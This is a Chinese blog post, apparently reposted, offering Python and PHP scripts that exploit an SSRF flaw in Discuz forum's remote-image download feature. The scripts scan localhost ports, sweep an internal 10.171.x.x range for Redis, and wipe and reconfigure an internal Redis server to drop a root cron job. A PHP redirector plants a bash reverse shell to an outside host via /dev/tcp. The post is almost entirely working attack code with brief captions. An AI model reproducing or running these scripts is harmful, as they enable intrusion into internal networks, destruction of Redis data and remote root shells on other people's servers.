【SSRF技巧拓展】————6、Discuz ssrf漏洞利用的几个python脚本

扫描本机开放的端口:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author: Lcy
# @Date:   2016-07-05 20:55:30
# @Last Modified by:   Lcy
# @Last Modified time: 2016-10-10 16:26:14
import requests
import threading
import Queue
import time
 
threads_count = 2
que = Queue.Queue()
lock = threading.Lock()
threads = []
ports = [21,22,23,25,69,80,81,82,83,84,110,389,389,443,445,488,512,513,514,873,901,1043,1080,1099,1090,1158,1352,1433,1434,1521,2049,2100,2181,2601,2604,3128,3306,3307,3389,4440,4444,4445,4848,5000,5280,5432,5500,5632,5900,5901,5902,5903,5984,6000,6033,6082,6379,6666,7001,7001,7002,7070,7101,7676,7777,7899,7988,8000,8001,8002,8003,8004,8005,8006,8007,8008,8009,8069,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8091,8092,8093,8094,8095,8098,8099,8980,8990,8443,8686,8787,8880,8888,9000,9001,9043,9045,9060,9080,9081,9088,9088,9090,9091,9100,9200,9300,9443,9871,9999,10000,10068,10086,11211,20000,22022,22222,27017,28017,50060,50070]
for i in ports:
    que.put(str(i))
def run():
    while que.qsize() > 0:
        p = que.get()
        print p + "       \r",
        try:
            url = "http://bbs.phpinfo.me/forum.php?mod=ajax&action=downremoteimg&message=[img]http://tools.phpinfo.me/ssrf.php?s=ftp%26ip=127.0.0.1%26port={port}%26data=helo.jpg[/img]".format(
                port=p)
            r = requests.get(url,timeout=2.8)
        except:
            lock.acquire()
            print "{port}  Open".format(port=p)
            lock.release()
for i in range(threads_count):
    t = threading.Thread(target=run)
    threads.append(t)
    t.setDaemon(True)
    t.start()
 
while que.qsize() > 0:
    time.sleep(1.0)

扫描内网开放6379端口的主机:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author: Lcy
# @Date:   2016-07-05 20:55:30
# @Last Modified by:   Lcy
# @Last Modified time: 2016-07-21 14:38:04
import requests
import threading
import Queue
import time
threads_count = 20
que = Queue.Queue()
lock = threading.Lock()
threads = []
ip = "10.171."
for i in range(1,255):
    for j in range(1,255):
        que.put(ip + str(i) + '.'+str(j))
# for i in range(0,255):
#     que.put(ip + str(i))
def run():
    while que.qsize() > 0:
        ip = que.get()
        try:
            url = "http://bbs.phpinfo.me/forum.php?mod=ajax&action=downremoteimg&message=[img]http://tools.phpinfo.me/ssrf.php?s=ftp%26ip={ip}%26port={port}%26data=helo.jpg[/img]".format(
                ip=ip,
                port="65321")
            r = requests.get(url,timeout=5)
             
            try:
                url = "https://bbs.phpinfo.me/forum.php?mod=ajax&action=downremoteimg&message=[img]http://tools.phpinfo.me/ssrf.php?s=ftp%26ip={ip}%26port={port}%26data=helo.jpg[/img]".format(
                ip=ip,
                port="6379")
                r = requests.get(url,timeout=5)
                lock.acquire()
                print ip
                lock.release()
            except :
                lock.acquire()
                print "{ip}  6379 Open".format(ip=ip)
                lock.release()
        except:
            pass
 
for i in range(threads_count):
    t = threading.Thread(target=run)
    threads.append(t)
    t.setDaemon(True)
    t.start()
while que.qsize() > 0:
    time.sleep(1.0)

通过ssrf操作内网redis写任务计划反弹shell:

#!/usr/bin/env python
# coding=utf-8
# email: ringzero@0x557.org
 
import requests
 
host = '10.171.26.22'
port = '6379'
bhost = 'phpinfo.me'
bport = '32'
 
vul_httpurl = 'https://bbs.phpinfo.me/forum.php?mod=ajax&action=downremoteimg&message=[img]'
 
_location = 'http://tools.phpinfo.me/ssrf.php'
 
shell_location = 'http://tools.phpinfo.me/shell.php'
 
 
#1 flush db
 
_payload = '?s=dict%26ip={host}%26port={port}%26data=flushall'.format(
 
    host = host,
 
    port = port)
 
exp_uri = '{vul_httpurl}{0}{1}%23helo.jpg[/img]'.format(_location, _payload, vul_httpurl=vul_httpurl)
 
print exp_uri
 
print len(requests.get(exp_uri).content)
 
 
 
#2 set crontab command
 
_payload = '?s=dict%26ip={host}%26port={port}%26bhost={bhost}%26bport={bport}'.format(
 
    host = host,
 
    port = port,
 
    bhost = bhost,
 
    bport = bport)
 
exp_uri = '{vul_httpurl}{0}{1}%23helo.jpg[/img]'.format(shell_location, _payload, vul_httpurl=vul_httpurl)
 
print exp_uri
 
print len(requests.get(exp_uri).content)
 
 
 
#3 config set dir /var/spool/cron/
 
_payload = '?s=dict%26ip={host}%26port={port}%26data=config:set:dir:/var/spool/cron/'.format(
 
    host = host,
 
    port = port)
 
exp_uri = '{vul_httpurl}{0}{1}%23helo.jpg[/img]'.format(_location, _payload, vul_httpurl=vul_httpurl)
 
print exp_uri
 
print len(requests.get(exp_uri).content)
 
 
 
#4 config set dbfilename root
 
_payload = '?s=dict%26ip={host}%26port={port}%26data=config:set:dbfilename:root'.format(
 
    host = host,
 
    port = port)
 
exp_uri = '{vul_httpurl}{0}{1}%23helo.jpg[/img]'.format(_location, _payload, vul_httpurl=vul_httpurl)
 
print exp_uri
 
print len(requests.get(exp_uri).content)
 
 
 
#5 save to file
 
_payload = '?s=dict%26ip={host}%26port={port}%26data=save'.format(
 
    host = host,
 
    port = port)
 
exp_uri = '{vul_httpurl}{0}{1}%23helo.jpg[/img]'.format(_location, _payload, vul_httpurl=vul_httpurl)
 
print exp_uri
 
print len(requests.get(exp_uri).content)

ssrf.php:

<?php
$ip = $_GET['ip'];
$port = $_GET['port'];
$scheme = $_GET['s'];
$data = $_GET['data'];
header("Location: $scheme://$ip:$port/$data");
?>

shell.php:

<?php
$ip = $_GET['ip'];
$port = $_GET['port'];
$bhost = $_GET['bhost'];
$bport = $_GET['bport'];
$scheme = $_GET['s'];
header("Location: $scheme://$ip:$port/set:0:\"\\x0a\\x0a*/1\\x20*\\x20*\\x20*\\x20*\\x20/bin/bash\\x20-i\\x20>\\x26\\x20/dev/tcp/{$bhost}/{$bport}\\x200>\\x261\\x0a\\x0a\\x0a\"");
?>

转自:https://phpinfo.me/2017/02/23/1438.html

 

 

 

 

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值